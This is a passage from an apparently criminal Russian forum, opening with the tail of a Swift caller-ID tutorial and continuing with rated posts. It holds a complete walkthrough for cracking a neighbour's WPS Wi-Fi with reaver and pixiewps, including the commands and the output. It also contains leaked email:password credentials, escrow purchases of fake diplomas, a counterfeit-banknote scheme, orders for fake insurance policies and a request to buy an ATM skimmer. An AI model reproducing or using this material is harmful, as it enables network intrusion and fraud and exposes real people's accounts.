components = line.components(separatedBy: ",") // приводим номер к Int64 guard let phone = Int64(components[0]) else { return } let name = components[1] context.addIdentificationEntry(withNextSequentialPhoneNumber: phone, label: name) } } } Функция должна использовать минимум ресурсов, поэтому заверните итерацию цикла в autoreleasepool. Это позволит освобождать временные объекты и использовать меньше памяти. Все. Теперь после вызова функции addContacts телефон будет способен определять номера из массива numbers. Окончательную версию проекта можете скачать в репозитории на GitHub. Что дальше? Это лишь один из вариантов решения задачи. Его можно улучшить, используя бинарный файл вместо текстового, как сделал 2GIS. Это позволит быстрей записывать и читать данные. Соответственно, придется продумать структуру файла, а также переписать функции для записи и чтения. Когда у вас есть представление о том, как это работает, все в ваших руках.
-
1 балл
-
1 баллБлагодарю гарант за проведение сделки. Сегодня до скольки на связи, сейчас если что еще одну сделку провести хочу
-
1 балл
-
1 баллБОЛЬШОЕ СПАСИБО!!! Первый раз воспользовался гарант сервисом и очень переживал, деньги то не малые перевел!!, но все прошло качественно и теперь у меня есть ВЫСШЕЕ образование !
-
1 баллСейчас сберы устанавливают для борьбы со взломом красители, при повреждении датчиков которого, все купюры заливаются краской. У некоторых инкасаторов так же идут такие чемоданы. Сам неоднократно видел. Но пока тока вводят. Большинство случаев конечно по старинке. Кстати на холод также реагируют, в азот поместить не получится. Испорченные купюры банк поменяет, а вот грабитель уже нет. А вот тема с нарезкой и склеиванием 5000 купюры, как из одной сделать две фальшивки, которые терминал схавает оказываться еще работает. Думал что она вымерла год назад, но тут недавно попросил чувак, у которого были финансовые проблемы, и решился на такое, за два дня поправил свое положение. Тему выкладывать не буду. Но скажу, если хорошо загуглите то найдете.
-
1 балл
-
1 баллБро знакомому на базу надо 30 шт полисов ОСАГО серии ЕЕЕ, есть варик заказать? и в какие сроки это будет сделано? оч срочно надо!
-
1 баллБЕСПЛАТНАЯ РАЗДАЧА КУРСОВ 1=> бесплатный курс ( заработок на приложениях) http://filetowmr.ru/8644382201 2=> новый мануал по заработку на кино подписках. Всё подробно и пошагово описано, со скринами. http://filetowmr.ru/6552883733 только это не для ленивых.
-
1 баллСегодня я хочу рассказать как взломать WiFi WPA/WPA2 (WPS ATTACK) нам нужно будет: Linux (у меня стоит Kali Linux, наиболее удобна так как большинство утилит вшиты) Сетевая карта (PCI или USB не имеет значения, у меня PCI) Утилиты, которые потребуются уже вшиты в ОС. Но тем, у кого обычный линукс надо скачать вот эти утилиты - aircrack, wifite, reaver, pixiewps. Если все готово, то начинаем. Открываем терминал и пишем: airmon-ng - определяем наш беспроводной интерфейс. У каждого своя ситуация, в моем случае wlan0 Далее пишем следующее: airmon-ng start wlan0 - переводим в режим мониторинга. ВНИМАНИЕ название вашего интерфейса может изменится, в моем случае стало wlan0mon. После этого обычно остаются процессы, которые могут помешать их надо удалить используя kill **** (вместо **** id процесса) Теперь необходимо просканировать наше вайфай пространство: airodump-ng wlan0mon Используя утилиту wifite определим одну важную вещь(кстати, используя эту утилиту можно хакнуть вайфай без других утилит, но мне она не подходит): wifite запускается сканирование, выбираем сеть с включенным WPS. Но для того, чтобы все прошло успешно надо что бы в выбранной нами сети был клиент, без подключенного клиента это пустая трата времени. Если что, дожидаемся его появления. Wifite больше не пригодится. Взламывать WPS будем, используя reaver: reaver Далее: reaver -i wlan0mon -b F8:C0:91:14:C7:6B после -b должен быть bssid выбранной вами сети(смотрим в airodump-ng) Reaver начинает взлом, придется подождать пока не появятся E-Hash1 и E-Hash2 Итак, reaver закончил работу, но WPS PIN не появился, а появились данные о роутере все в норме. Тут то нам и нужен pixiewps: pixiewps Далее смотрим пример: pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 59:1f:11:57:8b:52:61:40:63:fe:8d:e3:3d:04:36:a5:74:43:01:c6:a7:4a:06:60:2f:3c:c5:d3:87:7c:c0:d4:7a:d3:6b:09:f7:c5:5c:b5:18:62:13:b6:0c:79:3c:8f:58:97:e7:0c:b7:47:3d:6c:60:21:6c:d3:bc:a7:62:05:80:6b:a7:9c:b2:26:b5:62:37:7b:7c:08:24:93:15:87:bb:ff:ed:3f:6a:33:54:4c:a1:a0:1b:2e:2e:d2:35:e8:5d:72:55:77:57:97:ef:9a:c0:2f:c1:20:cf:de:a9:7b:e2:eb:70:a5:86:4d:03:72:ec:5c:82:d9:a4:70:44:3a:30:3a:63:6a:8d:39:c8:5e:71:1f:66:ab:4d:89:6d:e7:98:36:91:1e:e4:fc:2a:e6:c9:3b:9b:88:80:be:6a:04:d0:7b:43:2b:26:4e:62:4c:ea:01:7d:1e:90:a2:ba:33:29:b3:94:0b:20:02:9f:55:05:d3:68:d2:26:41:9c:2e -s 99:98:3e:42:0c:88:55:58:e2:97:cc:86:db:2a:ba:89:d9:6b:55:d9:7b:9a:1b:c3:93:a9:c8:70:35:4c:0a:7b -z f4:d3:c8:f0:64:24:e5:da:a9:97:16:4b:58:3d:41:15:76:15:5b:01:9e:1e:77:81:ab:55:6d:7e:82:8d:71:d8 -a 95:c5:07:7a:ef:d1:f9:d7:6d:6d:44:6d:57:c5:d9:59:c6:60:4d:bf:de:34:cc:8f:94:d8:b8:e1:74:0f:0b:18 -n 02:cc:48:b6:5c:b4:1f:2d:54:b2:27:67:3d:29:70:8f Что получилось в итоге: Pixiewps 1.1 [*] E-S1: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [*] E-S2: 30:c9:c0:15:11:aa:81:5b:3b:cc:d4:79:26:4c:dc:f9 [+] WPS pin: 99956042 [*] Time taken: 1 s Итак, мы получили WPS PIN используя который можем подключится к взломаной сетке. Чтобы подключиься вводим WPS PIN вместо пароля. Ну вроде все!)Удачи взломать соседкий Wi Fi,но не забывайте это уголовно наказуемо!
-
1 балл
-
1 балл
-
1 балл
-
1 баллКанадский стартап Bionym привлек инвестиционный раунд A объемом $14 млн. Его возглавили фонды Ignition Partners и Relay Venture. В раунде также приняли участие Export Development Canada, MasterCard и Salesforce Ventures. Генеральный директор Bionym Карл Мартин (Karl Martin) сказал, что средства пойдут на запуск производства браслетов Nymi, расширение штата и строительство экосистемы вокруг Nymi. Сейчас в Bionym работает около 40 человек. Компания активно ищет новых специалистов — соответствующее объявление расположено на ее официальном сайте. Приступить к поставкам Nymi по предзаказам стартап планирует до конца осени 2014 г. Bionym был основан в 2011 г. Первый раунд инвестиций он получил в августе 2013 г. ($1,4 млн). Примерно тогда же компания открыла предзаказ на браслет Nymi. Nymi измеряет электрическую активность, генерируемую сердечной мышцей (электрокардиограмма), и использует эти данные для аутентификации. Создатели браслета утверждают, что электрическая активность сердца уникальна для каждого человека и поэтому может служить паролем. Эти уникальные данные не зависят от частоты сердцебиения, подчеркивают в компании. Nymi предлагает один из методов биометрической аутентификации по аналогии со сканированием отпечатка пальца или радужной оболочки глаза. Браслет не требует заблаговременной активации, так как, находясь на запястье, он непрерывно мониторит сердечную деятельность. Устройство формирует закодированный беспроводной сигнал и отправляет его по Bluetooth на устройство, доступ к которому пользователь желает получить. Браслет предлагается использовать не только для входа в персональный компьютер, но и для отпирания дома, квартиры или автомобиля. Разработчики наделили систему трехфакторной аутентификацией. Подтверждать свою личность необходимо только один раз в день или после того, как браслет будет снят. Помимо доступа с помощью электрокардиограммы, Nymi поддерживает функцию отпирания замков с помощью пространственных жестов — благодаря встроенным акселерометру и гироскопу. То есть пользователю предлагается, например, начертить в воздухе определенную фигуру, которую знает только он, после чего браслет пошлет сигнал в компьютер или замок. Стоимость браслета составляет $79 для первых 20 тыс. заказов. Затем она будет увеличена до $99. Гаджет предлагается в трех вариантах: черном, белом и оранжевом. Для того чтобы устройство работало с Nymi, в нем должна быть поддержка этого браслета. До конца 2014 г. в компании обещают выпустить сопровождающие приложения для смартфонов на базе Android и iOS. Затем планируется выпустить приложения для компьютеров под управлением Windows и OS X. Все эти платформы в настоящее время поддерживаются в SDK и API Nymi. Разработчики могут создавать собственные программы. Интеграция с электронными дверными замками и автомобильными системами пока находится лишь в планах стартапа.
-
1 балл
-
1 балля бы вложил деньги в интернет, вернее в какой-нибудь социальный сервис, можно придумать и свой и вложить деньги в него только работать придетсяю В интернете гораздо легче открыть свой бизнес чем в какой-нибудь Москве где высокая конкуренция
-
1 баллВсе просто. Банки не понимают сути реалий этого бизнеса. За BG/LC вам товар никто не продаст. Залог формируется в процессе бизнеса, что берет время. И как всегда - банки не работают с алмазным сырьем и нетоварными слитками золота.
-
1 баллКак говорится :"Бесплатный сыр только в мышеловке". 80 % бесплатной информации решает только 20 % Ваших проблем. И всего лишь 20 % платной информации решают остальные 80 % проблемы. Так что учиться надо. И не надеяться что какой-то добрый дядя вас бесплатно научит. Может только подучить.
-
1 баллНу, если кто-то пострадает из-за некачественной продукции, то будет и расследование, я думаю Хотя у нас в России не всегда дело доводят до конца Обычно поругаются-поругаются, и забывают
-
1 баллПеред московским судом предстанет хакер, укравший более 2 млн рублей через терминалы оплаты. Молодого человека поймали на пути к египетскому морю. По данным следствия, 20-летний москвич подключался со своего компьютера к системе электронных платежей ЗАО «ОСМП», переводил деньги с чужих счетов на специально созданные электронные кошельки. За две недели юный хакер похитил более 2,3 млн рублей. Информацию о подобных мошеннических схемах молодой человек почерпнул из Интернета. Но для осуществления ее москвич познакомился с создателем вирусной программы, позволяющей получать доступ к счетам клиентов платежных систем. Получая клиентские логины и пароли, молодой человек перечислял соучастнику деньги, а за свою работу получал определенное вознаграждение. Из сообщения пресс-служба МВД РФ: «Молодому человеку было заочно предъявлено обвинение, и его объявили в федеральный розыск в связи с тем, что он скрылся от органов следствия и суда». Однако полиция все-таки поймала молодого хакера. С поддельным паспортом его задержали при пересечении российской границы. Москвич собирался на отдых в Египет. Читайте также
-
1 балл
-
1 балл
-
1 балл
-
1 балл
-
1 баллКуплю скиммер предпочтительно wincor Slot+msrv007,msr206,cam работаю через гаранта
-
1 балл
-
1 баллdidy1983@spaces.ru:198319831983a difosgen98@yandex.ru:x5764801 digital20000@mail.ru:hazard666
-
1 балл
-
1 баллПолиция Колумбии поймала голубя, который транспортировал наркотики. Из-за слишком тяжёлого груза голубь приземлился недалеко от тюрьмы, и был пойман полицейскими. Согласно полицейским, голубь попытался доставить 45 грамм марихуаны в тюрьму на северо-востоке Колумбии. Однако задача оказалась для него слишком тяжёлой – из-за большого веса голубю было тяжело лететь. Голубь был пойман двумя полицейскими рядом с тюрьмой, в которую ему предстояло доставить наркотики. Полицейские сказали, что увидели голубя, который махал крыльями и пытался взлететь. К нему был прицеплен белый мешочек. Колумбийские наркоторговцы уже не в первый раз используют птиц в своих целях – не так давно, полиция задержала попугая, которого наркоторговцы использовали в качестве сторожа. «Преступники становятся всё умнее и умнее» - сказал начальник полиции города Букараманга, генерал Жозе Анжел Мендоса (Jose Angel Mendoza). «Они хотели доставить наркотики в тюрьму Букараманга, используя почтовых голубей. Сотрудники полиции нашли птицу рядом с тюрьмой. Она почти выполнила свою миссию, но из-за тяжёлого груза, не смогла долететь до тюрьмы».
-
1 балл